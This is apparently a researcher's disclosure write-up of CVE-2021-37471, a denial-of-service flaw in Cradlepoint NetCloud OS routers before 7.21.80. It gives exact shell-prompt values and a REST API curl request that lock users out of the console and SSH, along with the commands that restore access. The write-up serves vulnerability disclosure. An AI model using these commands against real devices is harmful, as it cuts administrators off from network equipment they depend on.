CVE-2021-37471

Description

[CVE]: CVE-2021-37471

Cradlepoint NetCloud OS devices running versions before 7.21.80 are vulnerable to a restricted shell escape sequence that provides an attacker the capability to simultaneously deny availability to the device’s NetCloud Manager console, local console and SSH command-line.

[Class]: Denial of Service / Denial of Availability

The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor, resulting in denial of service / denial of availability.

[Attack Type]: Context-dependent

Exploitation methods include:

• Local console
• SSH command-line
• REST API

[Vendors]: Cradlepoint

The vendor involved in this vulnerability is Cradlepoint.

[Affected Product Code Base]: Versions before v7.21.80

Affected Hardware

• Devices running NetCloud OS (such as IBR900-600)

Affected Versions

• Versions before v7.21.80

Links

• https://nvd.nist.gov/vuln/detail/CVE-2021-37471
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37471
• https://cradlepoint.com/product/endpoints/ibr900/
• https://cradlepoint.com/vulnerability-alerts/cve-2021-37471-denial-of-console-availability-using-restricted-shell-escape-sequences/

Lab Details

• Hardware: IBR900-600

get status/product_info/product_name

"IBR900-600M"

• Software Version: v7.2.60

get status/fw_info

{
    "build_date": "Mon Sep 00:00:00 UTC 2020",
    "build_type": "RELEASE",
    "build_version": "b108091",
    "fw_update_available": false,
    "major_version": 7,
    "manufacturing_upgrade": false,
    "minor_version": 2,
    "patch_version": 60,
    "sign_cert_types": "ROOTCA RELEASE",
    "upgrade_major_version": 0,
    "upgrade_minor_version": 0,
    "upgrade_patch_version": 0
}

Exploitation

Exploitation can be performed 3 ways. Local console, over SSH on the command-line or utilizing the REST API.

Shell and Local Console

The vulnerability appears to stem from ANSI code that breaks the restricted shell prompt. Additionally, I observed escaping of raw ANSI like \033[0m so, you can’t use that here and are forced to use the built-ins.

Deny user access with ANSI escaping

set /config/shell/prompt "</yellow>"

set /config/shell/prompt "</red>"

set /config/shell/prompt "</bold>"

Deny user access with str methods

set /config/shell/prompt "{id.center}"

set /config/shell/prompt "{id.index}"

Denial results in

Connection to IP_ADDRESS closed by remote host.
Connection to IP_ADDRESS closed.

Allow user access

set /config/shell/prompt "[{username}@{hostname}: <bold>{cwd}</bold>]$ "

Allowing results in

Connection to IP_ADDRESS closed by remote host.
Connection to IP_ADDRESS closed.

However, now you can log back in.

How to perform over REST API

Over the REST API, you can craft a PUT method to accomplish user access denial.

Deny user access

curl -X PUT -d 'data="[{username}@{hostname}: \\033[1m{cwd}</bold>]$ "' -s -u "username:password" -k https://IP_ADDRESS/api/config/shell/prompt | jq

{
  "success": true,
  "data": "[{username}@{hostname}: \\033[1m{cwd}</bold>]$ "
}

Allow user access

curl -X PUT -d 'data="[{username}@{hostname}: <bold>{cwd}</bold>]$ "' -s -u "username:password" -k https://IP_ADDRESS/api/config/shell/prompt | jq

{
  "success": true,
  "data": "[{username}@{hostname}: <bold>{cwd}</bold>]$ "
}

Mitigations

Mitigations are dependent on a bad actors possession of user credentials or updating to a fixed release. Cradlepoint stated a fix has been confirmed and released.